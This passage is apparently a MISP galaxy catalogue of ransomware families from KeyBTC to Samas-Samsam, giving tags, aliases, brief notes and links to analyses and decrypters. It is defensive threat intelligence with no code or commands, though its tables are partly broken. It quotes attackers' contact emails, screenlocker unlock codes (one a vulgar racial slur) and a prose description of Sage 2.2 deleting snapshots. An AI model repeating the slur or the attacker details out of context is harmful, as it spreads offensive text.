Ransomware

The tag is: `misp-galaxy:ransomware="KeyBTC"`

*Table 5341. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
</tbody>
</table>

**KEYHolder**

Ransomware via remote attacker. tuyuljahat@hotmail.com contact address

The tag is: `misp-galaxy:ransomware="KEYHolder"`
**KillerLocker**

Ransomware Possibly Portuguese dev

The tag is: `misp-galaxy:ransomware="KillerLocker"`

**KimcilWare**

Ransomware websites only

The tag is: `misp-galaxy:ransomware="KimcilWare"`

**Korean**

Ransomware Based on HiddenTear

The tag is: `misp-galaxy:ransomware="Korean"`
**Kozy.Jozy**

Ransomware Potential Kit selectedkozy.jozy@yahoo.com kozy.jozy@yahoo.com unlock92@india.com

The tag is: **misp-galaxy:ransomware="Kozy.Jozy"**

Kozy.Jozy is also known as:

- QC

*Table 5346. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/KozyJozy.html">http://www.nyxbone.com/malware/KozyJozy.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/kozy.html">https://id-ransomware.blogspot.com/2016/06/kozy.html</a></td>
</tr>
</tbody>
</table>

**KratosCrypt**

Ransomware kratosdimetrici@gmail.com

The tag is: **misp-galaxy:ransomware="KratosCrypt"**

*Table 5347. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/746090483722686465">https://twitter.com/demonslay335/status/746090483722686465</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/kratoscrypt-ransomware-aes-256-0.html">https://id-ransomware.blogspot.com/2016/06/kratoscrypt-ransomware-aes-256-0.html</a></td>
</tr>
</tbody>
</table>

**KryptoLocker**

Ransomware Based on HiddenTear

The tag is: **misp-galaxy:ransomware="KryptoLocker"**

*Table 5348. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/kryptolocker-ransomware-aes-256.html">https://id-ransomware.blogspot.com/2016/07/kryptolocker-ransomware-aes-256.html</a></td>
</tr>
</tbody>
</table>

**LanRan**

Ransomware Variant of open-source MyLittleRansomware

The tag is: **misp-galaxy:ransomware="LanRan"**
LeChiffre

Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker

The tag is: misp-galaxy:ransomware="LeChiffre"

Lick

Ransomware Variant of Kirk

The tag is: misp-galaxy:ransomware="Lick"

Linux.Encoder

Ransomware Linux Ransomware

The tag is: misp-galaxy:ransomware="Linux.Encoder"

Linux.Encoder is also known as:

- Linux.Encoder.{0,3}
LK Encryption

Ransomware Based on HiddenTear

The tag is: `misp-galaxy:ransomware="LK Encryption"

Table 5353. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/845183290873044994">https://twitter.com/malwrhunterteam/status/845183290873044994</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/lk-encryption-ransomware.html">http://id-ransomware.blogspot.com/2017/03/lk-encryption-ransomware.html</a></td>
</tr>
</tbody>
</table>

LLTP Locker

Ransomware Targeting Spanish speaking victims

The tag is: `misp-galaxy:ransomware="LLTP Locker"

Table 5354. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/lltp-ransomware.html">http://id-ransomware.blogspot.com/2017/03/lltp-ransomware.html</a></td>
</tr>
</tbody>
</table>

Locker

Ransomware has GUI

The tag is: `misp-galaxy:ransomware="Locker"

Locker is also known as:

- LockeR

Table 5355. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

LockLock

Ransomware

The tag is: `misp-galaxy:ransomware="LockLock"
**Locky**

Ransomware Affiliations with Dridex and Necurs botnets

The tag is: `misp-galaxy:ransomware="Locky"`

Locky is also known as:

- Locky-Odin
- Locky-Osiris
- Locky-Osiris 2016
- Locky-Osiris 2017

Locky has relationships with:

- similar: `misp-galaxy:malpedia="Locky"` with `estimative-language:likelihood-probability="likely"`

**Lortok**

Ransomware

The tag is: `misp-galaxy:ransomware="Lortok"`

Table 5358. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/lortok-ransomware-aes-256-5.html">https://id-ransomware.blogspot.com/2016/06/lortok-ransomware-aes-256-5.html</a></td>
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</tbody>
</table>
LowLevel04
Ransomware Prepends filenames
The tag is: misp-galaxy:ransomware="LowLevel04"

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/04/lowlevel04-ransomware.html">http://id-ransomware.blogspot.com/2016/04/lowlevel04-ransomware.html</a></td>
</tr>
</tbody>
</table>

M4N1F3STO
Ransomware Does not encrypt Unlock code=suckmydicknigga
The tag is: misp-galaxy:ransomware="M4N1F3STO"

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://twitter.com/jiriatvirlab/status/808015275367002113">https://twitter.com/jiriatvirlab/status/808015275367002113</a></td>
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<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/12/m4n1f3sto-ransomware.html">http://id-ransomware.blogspot.com/2016/12/m4n1f3sto-ransomware.html</a></td>
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</table>

Mabouia
Ransomware OS X ransomware (PoC)
The tag is: misp-galaxy:ransomware="Mabouia"

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://www.youtube.com/watch?v=9nJv_PN2m1Y">https://www.youtube.com/watch?v=9nJv_PN2m1Y</a></td>
</tr>
</tbody>
</table>

MacAndChess
Ransomware Based on HiddenTear
The tag is: misp-galaxy:ransomware="MacAndChess"

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/macandchess-ransomware.html">http://id-ransomware.blogspot.com/2017/03/macandchess-ransomware.html</a></td>
</tr>
</tbody>
</table>

Magic
Ransomware Based on EDA2
The tag is: `misp-galaxy:ransomware="Magic"`  

**Table 5363. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/04/magic-ransomware.html">http://id-ransomware.blogspot.com/2016/04/magic-ransomware.html</a></td>
<td></td>
</tr>
</tbody>
</table>

**MaktubLocker**

Ransomware

The tag is: `misp-galaxy:ransomware="MaktubLocker"`

**Table 5364. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>

**MarsJoke**

Ransomware

The tag is: `misp-galaxy:ransomware="MarsJoke"`

**Table 5365. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>

**Meister**

Ransomware Targeting French victims

The tag is: `misp-galaxy:ransomware="Meister"`

**Table 5366. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/siri_urz/status/840913419024945152">https://twitter.com/siri_urz/status/840913419024945152</a></td>
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</table>

**Meteoritan**

Ransomware
The tag is: misp-galaxy:ransomware="Meteoritan"

Table 5367. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/844614889620561924">https://twitter.com/malwrhunterteam/status/844614889620561924</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/meteoritan-ransomware.html">http://id-ransomware.blogspot.com/2017/03/meteoritan-ransomware.html</a></td>
</tr>
</tbody>
</table>

**MIRCOP**

Ransomware Prepends files Demands 48.48 BTC

The tag is: misp-galaxy:ransomware="MIRCOP"

MIRCOP is also known as:

- Crypt888
- MicroCop

Table 5368. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.avast.com/ransomware-decryption-tools#!/">https://www.avast.com/ransomware-decryption-tools#!/</a></td>
</tr>
<tr>
<td><a href="http://www.nyxbone.com/malware/Mircop.html">http://www.nyxbone.com/malware/Mircop.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/mircop-ransomware-4848.html">https://id-ransomware.blogspot.com/2016/06/mircop-ransomware-4848.html</a></td>
</tr>
</tbody>
</table>

**MireWare**

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MireWare"

Table 5369. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/mireware-ransomware.html">http://id-ransomware.blogspot.com/2016/05/mireware-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Mischa**

Ransomware Packaged with Petya PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Mischa"
Mischa is also known as:

- "Petya's little brother"
- Misha
- Petya+Mischa
- Petya-2

Table 5370. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html">https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html</a></td>
</tr>
</tbody>
</table>

**MM Locker**

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="MM Locker"

MM Locker is also known as:

- Booyah

MM Locker has relationships with:

- similar: misp-galaxy:ransomware="Booyah" with estimative-language:likelihood-probability="likely"

Table 5371. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/mm-locker-ransomware-aes-2256-1.html">https://id-ransomware.blogspot.com/2016/06/mm-locker-ransomware-aes-2256-1.html</a></td>
</tr>
</tbody>
</table>

**Mobef**

Ransomware

The tag is: misp-galaxy:ransomware="Mobef"

Mobef is also known as:

- Yakes
- CryptoBit

Mobef has relationships with:
similar: misp-galaxy:ransomware="CryptoBit" with estimative-language:likelihood-probability="likely"

similar: misp-galaxy:ransomware="Mobef-JustFun" with estimative-language:likelihood-probability="likely"

Table 5372. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="http://nyxbone.com/malware/Mobef.html">http://nyxbone.com/malware/Mobef.html</a></td>
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<tr>
<td><a href="http://nyxbone.com/images/articulos/malware/mobef/0.png">http://nyxbone.com/images/articulos/malware/mobef/0.png</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/mobef-yakes-ransomware-4-bitcoins-2000.html">http://id-ransomware.blogspot.com/2016/05/mobef-yakes-ransomware-4-bitcoins-2000.html</a></td>
</tr>
</tbody>
</table>

Monument

Ransomware Use the DarkLocker 5 porn screenlocker - Jigsaw variant

The tag is: *misp-galaxy:ransomware="Monument"

Table 5373. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/844826339186135040">https://twitter.com/malwrhunterteam/status/844826339186135040</a></td>
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</table>

N-Splitter

Ransomware Russian Koolova Variant

The tag is: *misp-galaxy:ransomware="N-Splitter"

Table 5374. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://twitter.com/JakubKroustek/status/815961663644008448">https://twitter.com/JakubKroustek/status/815961663644008448</a></td>
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<td><a href="https://www.youtube.com/watch?v=dAVMgX8Zti4&amp;feature=youtu.be&amp;list=UU_TMZYaLIgjsdJMwurHAI4Q">https://www.youtube.com/watch?v=dAVMgX8Zti4&amp;feature=youtu.be&amp;list=UU_TMZYaLIgjsdJMwurHAI4Q</a></td>
</tr>
</tbody>
</table>

n1n1n1

Ransomware Filemaker: "333333333333"

The tag is: *misp-galaxy:ransomware="n1n1n1"

n1n1n1 is also known as:

- N1N1N1
NanoLocker

Ransomware no extension change, has a GUI

The tag is: `misp-galaxy:ransomware="NanoLocker"`

NanoLocker has relationships with:

- similar: `misp-galaxy:malpedia="NanoLocker"` with `estimative-language:likelihood-probability="likely"`

Nemucod

Ransomware 7zip (a0.exe) variant cannot be decrypted Encrypts the first 2048 Bytes

The tag is: `misp-galaxy:ransomware="Nemucod"`

Nemucod is also known as:

- Nemucod-7z
- Nemucod-AES
Netix

Ransomware

The tag is: misp-galaxy:ransomware="Netix"

Netix is also known as:

- RANSOM_NETIX.A

Table 5378. Table References

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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/01/netflix-ransomware.html">https://id-ransomware.blogspot.com/2017/01/netflix-ransomware.html</a></td>
</tr>
</tbody>
</table>

Nhtnwcuf

Ransomware Does not encrypt the files / Files are destroyed

The tag is: misp-galaxy:ransomware="Nhtnwcuf"

Table 5379. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/839221457360195589">https://twitter.com/demonslay335/status/839221457360195589</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/nhtnwcuf-ransomware.html">http://id-ransomware.blogspot.com/2017/03/nhtnwcuf-ransomware.html</a></td>
</tr>
</tbody>
</table>

NMoreira

Ransomware

The tag is: misp-galaxy:ransomware="NMoreira"

NMoreira is also known as:

- XRatTeam
- XPan

Table 5380. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/nmoreira">https://decrypter.emsisoft.com/nmoreira</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/fwosar/status/803682662481174528">https://twitter.com/fwosar/status/803682662481174528</a></td>
</tr>
<tr>
<td>id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html [id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html]</td>
</tr>
</tbody>
</table>
NoobCrypt

Ransomware

The tag is: misp-galaxy:ransomware="NoobCrypt"

Table 5381. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/JakubKroustek/status/75726755034641408">https://twitter.com/JakubKroustek/status/75726755034641408</a></td>
</tr>
</tbody>
</table>

Nuke

Ransomware

The tag is: misp-galaxy:ransomware="Nuke"

Table 5382. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/10/nuke-ransomware.html">http://id-ransomware.blogspot.com/2016/10/nuke-ransomware.html</a></td>
</tr>
</tbody>
</table>

Nullbyte

Ransomware

The tag is: misp-galaxy:ransomware="Nullbyte"

Table 5383. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/NullByteDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/NullByteDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/08/nullbyte-ransomware.html">http://id-ransomware.blogspot.com/2016/08/nullbyte-ransomware.html</a></td>
</tr>
</tbody>
</table>

ODCODOC

Ransomware

The tag is: misp-galaxy:ransomware="ODCODOC"

Table 5384. Table References
**Offline ransomware**

Ransomware email addresses overlap with .777 addresses

The tag is: *misp-galaxy:ransomware=“Offline ransomware”*

Offline ransomware is also known as:

- Vipasana
- Cryakl

Offline ransomware has relationships with:

- similar: *misp-galaxy:ransomware="Cryakl"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="Cryakl"* with *estimative-language:likelihood-probability="likely"

---

**OMG! Ransomware**

Ransomware. Infection: drive-by-download; Platform: Windows; Extortion by Prepaid Voucher

The tag is: *misp-galaxy:ransomware="OMG! Ransomware”*

OMG! Ransomware is also known as:

- GPCode

OMG! Ransomware has relationships with:

- similar: *misp-galaxy:malpedia="GPCode"* with *estimative-language:likelihood-probability="likely"
**Operation Global III**

Ransomware is a file infector (virus)

The tag is: `misp-galaxy:ransomware="Operation Global III"`

**Owl**

Ransomware

The tag is: `misp-galaxy:ransomware="Owl"`

Owl is also known as:

- CryptoWire

Owl has relationships with:

- similar: `misp-galaxy:malpedia="CryptoWire"` with `estimative-language:likelihood-probability="likely"`

**PadCrypt**

Ransomware has a live support chat

The tag is: `misp-galaxy:ransomware="PadCrypt"`

PadCrypt has relationships with:

- similar: `misp-galaxy:malpedia="PadCrypt"` with `estimative-language:likelihood-probability="likely"`
Padlock Screenlocker

Ransomware Unlock code is: ajVr/G\ RJz0R

The tag is: misp-galaxy:ransomware="Padlock Screenlocker"

Patcher

Ransomware Targeting macOS users

The tag is: misp-galaxy:ransomware="Patcher"

Patcher has relationships with:

- similar: misp-galaxy:ransomware="FileCoder" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Petya

Ransomware encrypts disk partitions PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Petya"

Petya is also known as:

- Goldeneye
Petya has relationships with:

- similar: misp-galaxy:malpedia="Petya" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="GoldenEye Ransomware" with estimative-language:likelihood-probability="likely"

Table 5392. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td>[<a href="https://www.youtube.com/watch?v=mS">https://www.youtube.com/watch?v=mS</a> qxFjZq_z4](<a href="https://www.youtube.com/watch?v=mS">https://www.youtube.com/watch?v=mS</a> qxFjZq_z4)</td>
</tr>
</tbody>
</table>

Philadelphia

Ransomware Coded by "The_Rainmaker"

The tag is: misp-galaxy:ransomware="Philadelphia"

Table 5393. Table References

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<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/philadelphia">https://decrypter.emsisoft.com/philadelphia</a></td>
</tr>
</tbody>
</table>

PizzaCrypts

Ransomware

The tag is: misp-galaxy:ransomware="PizzaCrypts"

Table 5394. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/pizzacrypts-ransomware-1.html">https://id-ransomware.blogspot.com/2016/07/pizzacrypts-ransomware-1.html</a></td>
</tr>
</tbody>
</table>

PokemonGO

Ransomware Based on Hidden Tear
The tag is: misp-galaxy:ransomware="PokemonGO"

Table 5395. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/pokemonGO.html">http://www.nyxbone.com/malware/pokemonGO.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/08/pokemongo-ransomware-aes-256.html">https://id-ransomware.blogspot.com/2016/08/pokemongo-ransomware-aes-256.html</a></td>
</tr>
</tbody>
</table>

Polyglot

Ransomware Immitates CTB-Locker

The tag is: misp-galaxy:ransomware="Polyglot"

Polyglot has relationships with:

• similar: misp-galaxy:malpedia="Polyglot" with estimative-language:likelihood-probability="likely"

Table 5396. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://support.kaspersky.com/8547">https://support.kaspersky.com/8547</a></td>
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<tr>
<td><a href="https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/">https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/</a></td>
</tr>
</tbody>
</table>

PowerWare

Ransomware Open-sourced PowerShell

The tag is: misp-galaxy:ransomware="PowerWare"

PowerWare is also known as:

• PoshCoder

PowerWare has relationships with:

• similar: misp-galaxy:malpedia="PowerWare" with estimative-language:likelihood-probability="likely"

Table 5397. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py">https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py</a></td>
</tr>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/PowerLockyDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/PowerLockyDecrypter.zip</a></td>
</tr>
</tbody>
</table>
PowerWorm

Ransomware no decryption possible, throws key away, destroys the files

The tag is: `misp-galaxy:ransomware="PowerWorm"`

Princess Locker

Ransomware

The tag is: `misp-galaxy:ransomware="Princess Locker"`

Table 5398. Table References

<table>
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</table>

PRISM

Ransomware

The tag is: `misp-galaxy:ransomware="PRISM"`

Table 5399. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/">http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/</a></td>
</tr>
</tbody>
</table>

Ps2exe

Ransomware

The tag is: `misp-galaxy:ransomware="Ps2exe"`

Table 5400. Table References
R

Ransomware

The tag is: `misp-galaxy:ransomware="R"`

R is also known as:

- NM3

Table 5401. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/jiriatvirlab/status/803297700175286273">https://twitter.com/jiriatvirlab/status/803297700175286273</a></td>
</tr>
</tbody>
</table>

R980

Ransomware

The tag is: `misp-galaxy:ransomware="R980"`

Table 5402. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/">https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/07/r980-ransomware-aes-256-rsa4096-05.html">http://id-ransomware.blogspot.com/2016/07/r980-ransomware-aes-256-rsa4096-05.html</a></td>
</tr>
</tbody>
</table>

RAA encryptor

RansomwarePossible affiliation with Pony

The tag is: `misp-galaxy:ransomware="RAA encryptor"`

RAA encryptor is also known as:

- RAA
- RAA SEP

Table 5403. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://reaqta.com/2016/06/raa-ransomware-delivering-pony/">https://reaqta.com/2016/06/raa-ransomware-delivering-pony/</a></td>
</tr>
</tbody>
</table>
Rabion

Ransomware RaaS Copy of Rania RaaS

The tag is: `misp-galaxy:ransomware="Rabion"`

Table 5404. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/CryptoInsane/status/846181140025282561">https://twitter.com/CryptoInsane/status/846181140025282561</a></td>
</tr>
</tbody>
</table>

Radamant

Ransomware

The tag is: `misp-galaxy:ransomware="Radamant"`

Radamant has relationships with:

- similar: `misp-galaxy:malpedia="Radamant"` with `estimative-language:likelihood-probability="likely"`

Table 5405. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/ramadan">https://decrypter.emsisoft.com/ramadan</a></td>
</tr>
<tr>
<td><a href="http://www.nyxbone.com/malware/ramadan.html">http://www.nyxbone.com/malware/ramadan.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/ramadan-ransomware.html">https://id-ransomware.blogspot.com/2016/04/ramadan-ransomware.html</a></td>
</tr>
</tbody>
</table>

Rakhni

Ransomware File might be partially encrypted

The tag is: `misp-galaxy:ransomware="Rakhni"`

Rakhni is also known as:

- Agent.iih
- Aura
- Autoit
- Pletor
- Rotor
- Lamer
- Isda
- Cryptokluchen
- Bandarchor

Rakhni has relationships with:

- similar: `misp-galaxy:ransomware="Bandarchor"` with `estimative-language:likelihood-probability="likely"`

Table 5406. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://support.kaspersky.com/us/viruses/disinfection/10556">https://support.kaspersky.com/us/viruses/disinfection/10556</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/bandarchor-ransomware-aes-256.html">https://id-ransomware.blogspot.com/2016/07/bandarchor-ransomware-aes-256.html</a></td>
</tr>
</tbody>
</table>

Ransomeer

Ransomware Based on the DUMB ransomware

The tag is: `misp-galaxy:ransomware="Ransomeer"`

Rannoh

Ransomware

The tag is: `misp-galaxy:ransomware="Rannoh"`

Table 5407. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></td>
</tr>
</tbody>
</table>

RanRan

Ransomware

The tag is: `misp-galaxy:ransomware="RanRan"`

RanRan is also known as:

- ZXZ

Table 5408. Table References
Ransoc

Ransomware Doesn’t encrypt user files

The tag is: misp-galaxy:ransomware="Ransoc"

Ransoc has relationships with:

• similar: misp-galaxy:malpedia="Ransoc" with estimative-language:likelihood-probability="likely"

Table 5409. Table References

Ransom32

Ransomware no extension change, Javascript Ransomware

The tag is: misp-galaxy:ransomware="Ransom32"

Table 5410. Table References

RansomLock

Ransomware Locks the desktop

The tag is: misp-galaxy:ransomware="RansomLock"

Table 5411. Table References
**RarVault**

Ransomware

The tag is: `misp-galaxy:ransomware="RarVault"

*Table 5412. Table References*

<table>
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</table>

**Razy**

Ransomware

The tag is: `misp-galaxy:ransomware="Razy"

*Table 5413. Table References*

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/Razy(German).html">http://www.nyxbone.com/malware/Razy(German).html</a></td>
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<tr>
<td><a href="http://nyxbone.com/malware/Razy.html">http://nyxbone.com/malware/Razy.html</a></td>
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<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/08/razy-ransomware-aes.html">http://id-ransomware.blogspot.com/2016/08/razy-ransomware-aes.html</a></td>
</tr>
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</table>

**Rector**

Ransomware

The tag is: `misp-galaxy:ransomware="Rector"

*Table 5414. Table References*

<table>
<thead>
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<th>Links</th>
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<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/4264">https://support.kaspersky.com/viruses/disinfection/4264</a></td>
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</tbody>
</table>

**RektLocker**

Ransomware

The tag is: `misp-galaxy:ransomware="RektLocker"

*Table 5415. Table References*

<table>
<thead>
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<th>Links</th>
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<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/4264">https://support.kaspersky.com/viruses/disinfection/4264</a></td>
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<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/08/rektlocker-ransomware.html">http://id-ransomware.blogspot.com/2016/08/rektlocker-ransomware.html</a></td>
</tr>
</tbody>
</table>
**RemindMe**

Ransomware

The tag is: `misp-galaxy:ransomware="RemindMe"`

*Table 5416. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/RemindMe.html">http://www.nyxbone.com/malware/RemindMe.html</a></td>
</tr>
<tr>
<td><a href="http://i.imgur.com/gV6i5SN.jpg">http://i.imgur.com/gV6i5SN.jpg</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/remindme-ransomware-2.html">http://id-ransomware.blogspot.com/2016/05/remindme-ransomware-2.html</a></td>
</tr>
</tbody>
</table>

**Rokku**

Ransomware possibly related with Chimera

The tag is: `misp-galaxy:ransomware="Rokku"`

Rokku has relationships with:

- similar: `misp-galaxy:malpedia="Rokku"` with `estimative-language:likelihood-probability="likely"`

*Table 5417. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/">https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/rokku-ransomware.html">https://id-ransomware.blogspot.com/2016/04/rokku-ransomware.html</a></td>
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</table>

**RoshaLock**

Ransomware Stores your files in a password protected RAR file

The tag is: `misp-galaxy:ransomware="RoshaLock"`

*Table 5418. Table References*

<table>
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<tbody>
<tr>
<td><a href="https://twitter.com/siri_urz/status/842452104279134209">https://twitter.com/siri_urz/status/842452104279134209</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/02/allyourdocuments-ransomware.html">https://id-ransomware.blogspot.com/2017/02/allyourdocuments-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Ransomewere**

Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background

The tag is: `misp-galaxy:ransomware="Ransomewere"`
**RussianRoulette**

Ransomware Variant of the Philadelphia ransomware

The tag is: `misp-galaxy:ransomware="RussianRoulette"`

---

**SADStory**

Ransomware Variant of CryPy

The tag is: `misp-galaxy:ransomware="SADStory"`

---

**Sage 2.2**

Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.

The tag is: `misp-galaxy:ransomware="Sage 2.2"`

---

**Samas-Samsam**

Ransomware Targeted attacks -Jexboss -PSE exec -Hyena

The tag is: `misp-galaxy:ransomware="Samas-Samsam"`
Samas-Samsam is also known as:

- samsam.exe
- MIKOPONI.exe
- RikiRafael.exe
- showmehowto.exe
- SamSam Ransomware
- SamSam
- Samsam
- Samas

Samas-Samsam has relationships with:

- similar: misp-galaxy:malpedia="SamSam" with estimative-language:likelihood-probability="likely"

Table 5423. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/SamSamStringDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/SamSamStringDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="http://blog.talosintel.com/2016/03/samSam-ransomware.html">http://blog.talosintel.com/2016/03/samSam-ransomware.html</a></td>
</tr>
<tr>
<td><a href="http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ransomware.pdf">http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ransomware.pdf</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/03/samsam.html">https://id-ransomware.blogspot.com/2016/03/samsam.html</a></td>
</tr>
</tbody>
